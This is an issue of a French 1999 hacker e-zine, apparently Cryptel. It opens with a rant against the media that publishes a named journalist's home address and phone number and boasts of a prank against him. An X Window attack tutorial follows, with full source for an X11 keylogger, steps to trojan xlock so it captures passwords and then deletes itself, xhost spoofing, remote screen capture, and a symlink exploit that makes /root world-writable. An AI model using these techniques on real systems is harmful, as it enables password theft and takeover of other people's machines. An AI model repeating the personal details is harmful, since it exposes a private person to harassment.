"J'ai piraté les ordinateurs de la nasa " on entend déja la ménagère de 50
ans s'écrier ouh la la mon dieu mais c'est horrible.
[X] Un "expert" en sécurité pour nous donner son avis
Chez canal plus on nous a prit comme "expert" Damien Bancal qui nous dit
qu'il y a des 'hackers et des voleurs, que les voleurs sont plus nombreux
qu'ils détournent les CB, et mettent le "souk" sur les systemes'
[X] Un homme de loi pour nous rappeller les peines encourrues
"La peine encourue pour le délit d'accès frauduleux à un service informatique
peut atteindre un an de prison et 100 000F d'amende."
[X] Et le journaliste qui nous mene l'article sur un ton alarmiste
"Le hacking se démocratise, et un simple fana de technique, comme Tobozo,
peut causer de réels dégâts"
Réfèrences :
http://www.lemonde.fr/nvtechno/techno/hackers/pirates.htm
http://www.liberation.com/multi/cahier/articles/sem99.13/cah990326b.html
http://www.liberation.com/multi/cahier/articles/sem99.09/cah990226c.html
Canal + Un autre journal
M6, TF1
Quand sur canal+ je vois 2 présentateurs qui font le procès des hackers
alors qu'ils ne connaissent absolument par le sujet et ne font que lire les
textes prémachés qu'on leur a filé. Quand dans ce meme dossier on voit un
damien bancal dire que "kevin mitnick n'est un voleur de CB et qu'il faut
faire un exemple" Quand dans le monde on lit des articles avec du vent et
-encore- Damien Bancal ("L'ami des hackers")Quand tous ces articles sont sur
le modèle hacker/mr secu/homme de loi/journaliste que dire ? Ils veulent tous
du sensas, ils promettent tous une approche différente sur le sujet et
pourtant a l'arrivée 100% identique. Et le sensas ils en veulent
"est ce que tu peux hacker ça ?"
"est ce que tu peux hacker ci ?"
Pour ça pas de prb ils ont tellement peu de personnes acceptant qu'ils
sortent le porte monnaie pour une interview, une info, des codes. On croirait
des magazines people qui payent des paparazzis pour trouver du scoop. Et le
paparazzi N°1 du web je vous le donne dans le mille :
*************
DAMIEN BANCAL
*************
"L'ami des hackers" qu'on retrouve dans tous les dossiers, c'est la référence
des médias (tf1, le monde, RTL, canal+)et surement celle de nos amis les V.
Il suffit d'aller sur son site web et de lire les annonces:
On recherche....Un ou des hackers français, peu importe l'âge, pour :
Des interviews (Pour un livre et la radio) Dans les deux cas, discretion
assurée. Mytho s'abstenir. Sujet : Vos motivations. Vous êtes interressés ?
Merci de me contacter ici dbancal@club-internet.fr
Pour le dossier de canal+ damien bancal est oui toujours lui a courru
derriere tout le monde est notamment cryptel, emails répétés à toute l'équipe
et à tous les membres, contact par l'intermédiaire d'autres personnes on
atteind alors le saoulant. Petite collecte d'info sur le toto
Damien Bancal
46 rue des meuniers
59000 Lilles
Tel: 06.86.34.82.27
Voila on a plus mais on balance pas tout. En attendant Mr Media/secu j'ai
l'honneur de vous annoncez que grace à l'achat d'un barbie par ma petite
soeur j'en ai profité pour vous inscrire personnellement au club BARBIE.
C'est promis vous recevrez votre cadeau de bienvenue tres rapidement en
espérant que vous serez un membre actif de ce club qui me semble plus vous
destinez que l'informatique et les pirates.
On dit du milieu hacker/phreaker qu'il est de l'underground, l'underground
c'est un milieu qui recherche ni la pub et ni les médias. Alors certains
vont dire oui mais si vous fermez la porte aux médias c'est comme ça qu'ils
vous montent des dossiers bidons avec pleins de conneries. A ça je réponds
NON ! Non car justement plusieurs tentatives on était mener avec la promesse
des journalistes d'une approche différente du milieu h/p à ce jour toutes
ces tentatives se sont bouclées avec la recette citée ci dessus. Donc,
- Oui nous n'avons pas confiance en vous
- Oui nous ne vous aimons pas
- Oui cette atitude envers vous, journalistes ne risquent pas de s'estomper
rapidement parce que vous avez trahie et menti
- Oui vous ne nous verrez pas de si tot dans un de vos shows
Ps: A l'annonce d'un encart sur damien Bancal dans cryptel, Mr est venu
illico sur le chan pour tenter de "discuter" (il a trouvé porte close) le
lendemain sur son site rubrique news on pouvait lire : "super site sur le
hacking/phreaking CRYPTEL allez le voir !" Super faux cul ouais. Ne recevant
ques des ondes négatives préparez vous il lance en juin une contre attaque
sur les réalités de la scene française ... ça promet
Aaah
Ps(3): J'aime pas les lentilles
Ps(2): Greets à toute la team cryptel et vive le club barbie
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) X-window ) 4.16 ( Cyberjunk (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
Quelques mots sur X Window
-========================-
by cyberjunk/snipper@hotmail.com
<<21/03/99
cryptel.cjb.net
members.xoom.com/nevroze
www.perdu.com
1. Edito
2. Questions éliminatoires
3. Comment X-Window marche ?
4. xhost, sésame ouvre toi :)
5. xauth,xdm et .Xauthority
6. Trojan & key logger
7. Saise d'écran à distance ...
8. Advisories pour admin peu soucieux :)
9. Conclusion =)
<SPECIAL GREETS: va2,aaah,neodyme,bob,jibus,bodhidarma,nitro,rockme,
[shen],el'latinos,x-ray,goliath,cyberbobjr,runeb,romano,elessar,rikkk's,
drahiin,white widow,zebda,massilia sound system,felecita et la suisse>
*Fais attention à la polution, à la police*
1. Edito ...
============
ToH ! Tiens on va parler de X-Window .. mmh :) Oui oui, Tout le monde
l'utilise
tout le monde est content. On entend du KDe par-ci, du Window-Maker par
la,
du Gnome, oui notre chère populasse l'a adopté, X Window Rulez ...
Jettons un oeil a kelkes
astuces qui nous permettrons d'aller plus loins dans nos nuits déjà
longues et agitées ... :)
Sur ces bonnes paroles, c'est parti ... =)
2. Questions éliminatiores :
============================
[ ] Je ne sais pas lire. *mmh?*
[ ] J'utilise pas linux.
[ ] Je ne sais pas ce k'est X-Window.
[ ] Je travaille pour le CERT
[ ] Je supporte le PSG *lol*
Si tu as répondu <OUI> à une de ces questions tu peux passer à
l'article
suivant. Celui-ci n'est pas fait pour toi ... ou ne t'interessera pas !
:)
3. Comment X-window marche ?
============================
X-Window fonctionne en mode client / server ce qui lui permet donc
d'être accéssible via le reseau,
Lan ou Internet. Les servers sont XFree86, Metro X par exemple et les
clients X-Terms, ou autre
applications. A ce propos, il existe aussi des servers et clients
destinées a Windows NT. La majorité
sont payant "evidemment" :/ mais vous pouvez trouver un paire de
shareware sur www.tucows.com .
Généralement, l'ensemble Client/Server tourne sur la même machine,
surement le cas sur votre box
linux. Mais bon rien ne vous empêche d'aller essayer de vous connecter
ailleurs =)
Jusque la tout va bien, mais alors quel probléme liée à la sécurité
touche ce systeme ? =)
Et Biiin (avec l'accent) ;) , il faut bien comprendre que le server et
le client communique bien
evidemment. (Ah bon ?! ;) ... par exemple:
- Configuration, paramétre de session ...
- Un evenement du genre souris, clavier etc ...
- Donnée relative à X, Création de fenêtre, ecriture de texte ...
Une fois donc connecter au Server X, il est donc normalement possible
de:
- agir sur les fenêtre, création et kill
- Capturer des evenements X (ie: lire les touches au claviers d'un
Xterm)
- Créer des evenements X (ie: envoyer du textes dans un Xterm)
Les servers X applique généralement une méthode de sécurité, tout ou
rien ... il accepte ou refuse
simplement la connection du client.
4. xhost, sésame ouvre toi :)
=============================
Un coup de xhost et la porte s'ouvre =) Ah Bon ? si si ! Si l'on
execute la commande:
[DeB_Box]/$ xhost +
N'importe qui pourra venir se connecter a note server X Window. Par
défault, sur les versions X11R6,
le server est normalement closed (xhost -). Pour ajouter une seule IP:
[DeB_Box]/$ xhost + x.x.x.x
Il en va evidement de même pour xhost - ! toh ! =) Vous pouvez voir
k'es-ce k'il en est sans rien
changer en tapant xhost tout cours depuis un xterm.
Mais bon ce système qui est installé par défault comporte un léger
problème qui mérite de s'y attarder =)
En effet, par défault, xhost est configuré pour accepter la
"localhost". A vous donc de vous faire passer
pour la localhost (rlogin, pipe, /etc/hosts, etc ...) et hop connection
accepté ...
5. xauth, xdm et .Xauthority
=============================
X n'est pas forcément sécurisé qu'avec xhost. Il peut avoir aussi été
configuré avec xauth, qui permet
d'autorisé les connections au server qu'avec certain user préalablement
réglé ... En fait il utilise un système
de clé.
xauth est le raccourci de X-Authetification =)
xdm est un utilitaire de login graphique
.Xautority est un fichier binaire se trouvant dans le home contenant
les infos relatives.
Pour extraire les infos .Xauthority, il faut taper xauth list. Le
résultat est de la forme suivante.
ip_machine:0 MIT-MAGIC COOKIE-1 73773549724714a......
IP Type d'authorisation Clé
Pour ajouter un utilisateur ayant le droit de se connecter, il faut
utiliser la commande xauth add
comme il suit:
$ xauth add ip_machine:0 MIT-MAGIC COOKIE-1 73773549724714a......
*Plus d'info dans le man =)*
6. Trojan & key logger
======================
Ou peut-on placer des chevaux de troies dans X-win ?!
Bin le plus simple et certainement le plus efficasse reste encore xlock
(verrouillage de la station) et XDM (login graphique). Si l'utilisateur
a un ./
dans son path, YES il est vulnerable. Pour ce, il suffit donc de placer
le trojan dans
son home directory =) Ca parait peut être con, mais ça reste efficasse
... Hé Oui, retrouver le code
de xlock (xlock.c), glisser une ligne qui écrit le password dans un
file et recompiler
le tout dans le ~ . Comme d'hab, une bonne et sage décision reste de
faire auto-détruire
le trojan aprés son éxecution.
Rem(1): Certain Window manager utilise leur propre lock. C'est le cas
dans kde, il s'
appelle "klock" .
Si vous êtes autorisé a vous connecter au serveur il vous est donc
normalement possible
de pouvoir "Ecouter" les communications entre celui-ci et d'autre
clients.
Voila le code d'un Key Logger pour X11, développé par
Technotronic/X-treme
a long time ago .. =) Lancer le comme indiqué dans l'en-tête et
regardez
défiler le résultat ;)
==================================== CUT HERE
====================================
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * *
* To compile, run it through your favorite ansi compiler something
like
* this :
*
* gcc -o xkey xkey.c -lX11 -lm
*
* To run it, just use it like this : xkey displayname:0
* and watch as that display's keypresses show up in your shell window.
*
* Dominic Giampaolo (nick@cs.maxine.wpi.edu)
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * /
#include <stdio.h>
#include <X11/X.h>
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/StringDefs.h>
#include <X11/Xutil.h>
#include <X11/Shell.h>
char *TranslateKeyCode(XEvent *ev);
Display *d;
void snoop_all_windows(Window root, unsigned long type)
{
static int level = 0;
Window parent, *children, *child2;
unsigned int nchildren;
int stat, i,j,k;
level++;
stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
if (stat == FALSE)
{
fprintf(stderr, "Can't query window tree...\n");
return;
}
if (nchildren == 0)
return;
/* For a more drastic inidication of the problem being exploited
* here, you can change these calls to XSelectInput() to something
* like XClearWindow(d, children[i]) or if you want to be real
* nasty, do XKillWindow(d, children[i]). Of course if you do that,
* then you'll want to remove the loop in main().
*
* The whole point of this exercise being that I shouldn't be
* allowed to manipulate resources which do not belong to me.
*/
XSelectInput(d, root, type);
for(i=0; i < nchildren; i++)
{
XSelectInput(d, children[i], type);
snoop_all_windows(children[i], type);
}
XFree((char *)children);
}
void main(int argc, char **argv)
{
char *hostname;
char *string;
XEvent xev;
int count = 0;
if (argv[1] == NULL)
hostname = ":0";
else
hostname = argv[1];
d = XOpenDisplay(hostname);
if (d == NULL)
{
fprintf(stderr, "Blah, can't open display: %s\n", hostname);
exit(10);
}
snoop_all_windows(DefaultRootWindow(d), KeyPressMask);
while(1)
{
XNextEvent(d, &xev);
string = TranslateKeyCode(&xev);
if (string == NULL)
continue;
if (*string == '\r')
printf("\n");
else if (strlen(string) == 1)
printf("%s", string);
else
printf("<<%s>>", string);
fflush(stdout);
}
}
#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];
char *TranslateKeyCode(XEvent *ev)
{
int count;
char *tmp;
KeySym ks;
if (ev)
{
count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE,
&ks,NULL);
key_buff[count] = '\0';
if (count == 0)
{
tmp = XKeysymToString(ks);
if (tmp)
strcpy(key_buff, tmp);
else
strcpy(key_buff, "");
}
return key_buff;
}
else
return NULL;
}
==================================== CUT HERE
====================================
7. Saise d'écran à distance ...
===============================
Le dump d'un écran X reste réalisable sur certaine machine. Cela peut
toujours servir
pour le fun, ou carrément piquer des infos ... pourkoi pas ? =)
La commande de base prévu plus ou moins a cet effet est xwd.
Pour un max d'info sur cette commande RTFM ! =) man xwd.
*DUMP d'une image*
[DeB_Box]/$ xwd -root localhost:0.0 > image
*READING d'une image*
[DeB_Box]/$ xwud -in image
(Même reflexion, man xwud, pour plus d'info)
Pour les XTerm, il faut procéder différement, il faut utiliser les
params suivants: xwd -name xterm
8. Advisories pour admin peu soucieux :)
=========================================
Quelques admins rezo peu soucieux n'update pas le server X et laisse
celui ki ont installer tout au
départ. C'est un tort, vu que quelque version antérieure de XF86
contiennent quelques exploits comme
toute application unix qui se respecte. ;) Pour les retrouver, jetter
un oiel sur le web de XFree86.
Le dernier révélé le 28 Mars 99 concerne les server xf86-3.3.3 à 5.
C'est la version fournie avec Red
Hat 5.2 ... 1 Bug de plus ;)
Le server crée un répertoire dans /tmp sous le nom de .X11-unix avec le
malheureux mode 1777 ;)
Bon pour en profiter, il vous faut créer un lien symbolique avec ce nom
et le diriger sur le
repertoire cible. (ie: ln -s /root /tmp/.X11-unix)
Ensuite, une fois que X-Window s'est lancé le répertoire cible se
mettra au mode 1777 ! =)
Attention, vous aller changer le mode d'un repertoire !
Assurrer vos arrière. Le remettre comme avant est une autre histoire
... Mais bon ca peut toujours
être utile =)
Rem(1): Ca marche pas sur les versions précedentes tels que 3.3.2.3
fournit avec Debian 2.0 par exemple.
Rem(2): Il est clair que le server X n'a rien a voir avec la distrib,
mais je les cite comme exemple car
il est fournit sur le Cd.
9. Conclusion !
================
Blablabla usuel ! *Toh* Bin oui, en espérant que vous avez reussi a
trouvé une particule d'information
utile, n'hésiter pas a mailer vos commentaire, d'autre
technik/info/etc... ?! à snipper@hotmail.com ou
m'écrire a:
Mr Daniel Padouin
163 avenue d'Italie
75013 PARIS
*no offence, just for the fun*
Bonne documentation à ce sujet: Crash course in X Window Security,
CIAC-2316 Securing X Window, le MAN! :)
ainsi que le web www.xfree86.org section Security. :)
Restons cool, la meilleure politik c'est gentleman s'en battent les
couilles, en gros restons ZEN ...
Pas besoin de stresser, n'est-ce pas ? N'essayerais-je pas de me
rassurer pour mes partiels ki arrivent
a grand pas ... mais non ..... *gggrrrr* Tchuss (?!) Mais kes ki vous
prend de lire ce bordel ? A oui ...
Merde j'ai oublier de préciser , bin ... roulement de tambour ....
blamblamblam ... c'est finni ...
-[END]-
(¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯)
) Ze end ) 4.17 ( vatoo (
(_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_)
En espérant que cette édition vous aura plu autant qu'on a kiffé à la rédiger =)
Greetings à:
Aaaaaah,
drahiin (t passé ou bon dieu?),
cyberjunk,
dafalgan,
bob,
jibus,
rockme,
larsen,
goliath,
mikasoft,
les habitues du chan,
Garg du Paris Underground (on reviendra), ainsi k' a Yoda,
Au meeting Cryptel (fuck ft =),
Et un grand grand merci a Phil-31 pour s'etre aussi bien oqp des bots.. On t'aime Philou =),
A tous ceux ke j ai oublié...
Aaaaamicalement :)
vatoo.
